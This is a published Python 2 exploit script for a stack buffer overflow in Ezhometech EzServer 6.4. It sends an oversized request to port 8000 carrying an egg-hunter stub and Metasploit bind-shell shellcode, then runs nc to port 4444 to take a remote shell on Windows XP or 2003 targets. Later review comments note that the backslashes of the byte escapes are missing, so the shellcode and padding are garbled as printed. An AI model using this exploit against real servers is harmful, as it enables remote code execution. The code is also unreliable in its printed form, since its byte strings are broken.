
# Title : Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Published : 2012-06-18
# Author :


# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
 
### Software Description
# EZserver is a video server that streams Full HD to various devices.

### Vulnerability Details
# A buffer overflow condition exists in URL handling: sending a long GET request
# will cause the server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so a sufficiently long request string will crash the program regardless of the method used.
 
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor; PoC released.

#!/usr/bin/python

import sys
import struct
from socket import *
from os import system
from time import sleep

# Short stub appended to `buff` (see `buff+= hunt` below) just before the
# 5000-character "x44" tail. It carries "x77x30x30x74", the hex spelling of
# the ASCII tag "w00t", which is the marker `buff` starts with ("w00tw00t").
# NOTE(review): every item here reads like a `\x..` escape with the backslash
# dropped, so as printed each "x.." is three ASCII characters rather than one
# byte; the listing appears to have lost its backslashes in extraction, and
# lengths computed from it will not match the original script.
hunt = (
"x66x81xCAxFFx0Fx42x52x6A"
"x02x58xCDx2Ex3Cx05x5Ax74"
"xEFxB8x77x30x30x74x8BxFA"
"xAFx75xEAxAFx75xE7xFFxE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, 

# Encoded payload string placed in `buff` directly after the "w00tw00t" marker.
# The listing holds 50 lines of 15 "x.." items plus one final item = 751 items,
# which matches the "751 bytes" in the comment above, so each item stands for
# one byte. NOTE(review): as with `hunt`, the `\` of every `\x..` escape is
# missing as printed, so Python reads each item as three ASCII characters.
shellcode = ("x89xe5xdaxcfxd9x75xf4x5dx55x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx49x45x50"
"x35x50x53x30x35x30x4bx39x4ax45x36x51x38x52x33"
"x54x4cx4bx50x52x56x50x4cx4bx46x32x44x4cx4cx4b"
"x30x52x45x44x4cx4bx33x42x37x58x44x4fx38x37x51"
"x5ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx47x4c"
"x53x51x43x4cx34x42x46x4cx37x50x49x51x38x4fx54"
"x4dx53x31x38x47x4ax42x4ax50x36x32x56x37x4cx4b"
"x56x32x44x50x4cx4bx37x32x37x4cx43x31x38x50x4c"
"x4bx37x30x33x48x4bx35x59x50x54x34x31x5ax33x31"
"x4ex30x36x30x4cx4bx30x48x52x38x4cx4bx56x38x57"
"x50x53x31x4ex33x4ax43x57x4cx30x49x4cx4bx50x34"
"x4cx4bx53x31x39x46x50x31x4bx4fx36x51x59x50x4e"
"x4cx59x51x48x4fx34x4dx45x51x59x57x50x38x4bx50"
"x53x45x5ax54x33x33x53x4dx4bx48x47x4bx33x4dx31"
"x34x42x55x4ax42x46x38x4cx4bx36x38x31x34x45x51"
"x38x53x55x36x4cx4bx54x4cx50x4bx4cx4bx50x58x35"
"x4cx43x31x59x43x4cx4bx34x44x4cx4bx35x51x48x50"
"x4cx49x31x54x31x34x57x54x51x4bx31x4bx55x31x56"
"x39x30x5ax50x51x4bx4fx4dx30x31x48x31x4fx30x5a"
"x4cx4bx54x52x5ax4bx4dx56x51x4dx33x58x37x43x47"
"x42x45x50x53x30x43x58x34x37x53x43x46x52x31x4f"
"x50x54x52x48x30x4cx54x37x46x46x53x37x4bx4fx39"
"x45x58x38x4cx50x55x51x43x30x45x50x37x59x58x44"
"x46x34x56x30x53x58x31x39x4dx50x32x4bx45x50x4b"
"x4fx58x55x36x30x56x30x56x30x46x30x47x30x46x30"
"x31x50x46x30x55x38x4ax4ax44x4fx39x4fx4bx50x4b"
"x4fx48x55x4dx59x59x57x50x31x59x4bx30x53x55x38"
"x55x52x35x50x52x31x51x4cx4bx39x4ax46x32x4ax32"
"x30x31x46x50x57x35x38x49x52x59x4bx56x57x53x57"
"x4bx4fx39x45x30x53x51x47x52x48x4ex57x4dx39x37"
"x48x4bx4fx4bx4fx49x45x51x43x50x53x30x57x35x38"
"x44x34x5ax4cx47x4bx4bx51x4bx4fx49x45x56x37x4c"
"x49x58x47x43x58x34x35x42x4ex50x4dx53x51x4bx4f"
"x58x55x55x38x43x53x52x4dx33x54x55x50x4cx49x4b"
"x53x51x47x46x37x31x47x36x51x4cx36x33x5ax42x32"
"x31x49x46x36x5ax42x4bx4dx45x36x48x47x47x34x31"
"x34x37x4cx55x51x33x31x4cx4dx30x44x47x54x44x50"
"x48x46x35x50x30x44x30x54x30x50x46x36x51x46x56"
"x36x37x36x46x36x30x4ex31x46x51x46x51x43x31x46"
"x32x48x52x59x48x4cx57x4fx4bx36x4bx4fx38x55x4d"
"x59x4dx30x50x4ex56x36x51x56x4bx4fx36x50x43x58"
"x54x48x4cx47x55x4dx33x50x4bx4fx4ex35x4fx4bx4a"
"x50x58x35x4fx52x36x36x53x58x49x36x4dx45x4fx4d"
"x4dx4dx4bx4fx58x55x47x4cx43x36x53x4cx35x5ax4d"
"x50x4bx4bx4dx30x54x35x55x55x4fx4bx57x37x35x43"
"x32x52x52x4fx43x5ax45x50x51x43x4bx4fx4ex35x41"
"x41")

# Per-target padding: winxp() prepends junk1, win2k3() prepends junk2, and
# crash() sends junk3 on its own. NOTE(review): "x41"/"x42"/"x43"/"x44"/"x90"
# read like `\x..` escapes that lost their backslash, so each repeat unit is
# three ASCII characters as printed, not one byte.
junk1 = "x41" * 5025
junk2 = "x42" * 5029
junk3 = "x43" * 10000

# The common tail shared by winxp() and win2k3(), assembled in one join in
# the same order the original built it with successive `buff +=` lines:
# marker, shellcode, 100 filler units, a 4-item sequence, a little-endian
# 32-bit value, 16 filler units, the `hunt` stub, then 5000 "x44" units.
buff = "".join([
	"w00tw00t",
	shellcode,
	"x90" * 100,
	"xebx08x90x90",
	struct.pack('<L', 0x10212779),
	"x90" * 16,
	hunt,
	"x44" * 5000,
])

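def _prompt_host():
	"""Ask the operator for the target address on stdin and return it as typed."""
	return raw_input("[!] Target IP: ")


def _deliver(host, payload):
	"""Open one TCP connection to ``host``:8000, send ``payload`` once, close it.

	The socket is closed in ``finally`` so a failed ``connect``/``send`` no
	longer leaves it open (the original closed it only on the success path).
	``error`` (socket.error, brought in by ``from socket import *``) is left
	to propagate so the caller can report it.
	"""
	print "[!] Connecting to %s on port 8000" %host
	s = socket(AF_INET, SOCK_STREAM)
	try:
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		s.send(payload)
	finally:
		s.close()


def _report_and_exit(exc):
	"""Print the original failure banner plus the actual error text, then exit.

	The original bare ``except:`` printed the banner for *any* exception,
	including KeyboardInterrupt during the sleeps, and hid the reason.
	"""
	print "[x] Could not connect to the server x_x"
	print "[x] %s" % exc
	sys.exit()


def _shell(host, delay):
	"""Pause (5 s, then ``delay`` s) and hand the terminal to ``nc -v host 4444``.

	``host`` is interpolated unquoted into a shell command line exactly as in
	the original; it comes from the operator's own prompt, so any shell
	metacharacters in it are executed on the operator's machine, not remotely.
	"""
	print "[+] Wait for hunter.."
	sleep(5)
	print "[+] Connecting to target shell!"
	sleep(delay)
	system("nc -v %s 4444" %host)


def winxp():
	"""Windows XP SP3 entry: sends junk1 + buff, then runs nc after 5 + 2 s.

	Exits the process via ``_report_and_exit`` on a socket ``error``.
	"""
	try:
		host = _prompt_host()
		_deliver(host, junk1+buff)
	except error as e:
		_report_and_exit(e)
	else:
		_shell(host, 2)


def win2k3():
	"""Windows 2003 SP2 entry: identical to winxp() but with junk2 and a 1 s delay."""
	try:
		host = _prompt_host()
		_deliver(host, junk2+buff)
	except error as e:
		_report_and_exit(e)
	else:
		_shell(host, 1)


def crash():
	"""Debug entry: sends junk3 only (no buff) and prints a reminder; no nc step."""
	try:
		host = _prompt_host()
		_deliver(host, junk3)
	except error as e:
		_report_and_exit(e)
	else:
		print "[+] Server should be crashed! Check your debugger"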

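print "#################################################################"
print "#     EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit	#"
print "#              by modpr0be[at]spentera | @modpr0be		#"
print "#           thanks to: otoy, cikumel, y0k | @spentera		#"
print "================================================================="
# NOTE(review): the leading "t" and trailing "n" in the three menu lines read
# like "\t" / "\n" escapes whose backslash was lost in extraction; kept as printed.
print "t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "t3.Crash only (debug)n"

# Up to three attempts at a valid menu choice; every valid branch exits the script.
a = 0
while a < 3:
	a = a + 1
	# raw_input() + int() replaces input(): under Python 2, input() evaluates
	# whatever is typed as a Python expression, so arbitrary text at this prompt
	# ran as code. A non-numeric entry now simply falls through to the retry line.
	try:
		op = int(raw_input("[!] Choose your target OS: "))
	except ValueError:
		op = None
	if op == 1:
		winxp()
		sys.exit()
	elif op == 2:
		win2k3()
		sys.exit()
	elif op == 3:
		crash()
		sys.exit()
	else:
		print "[-] Oh plz.. pick the right one :)rn"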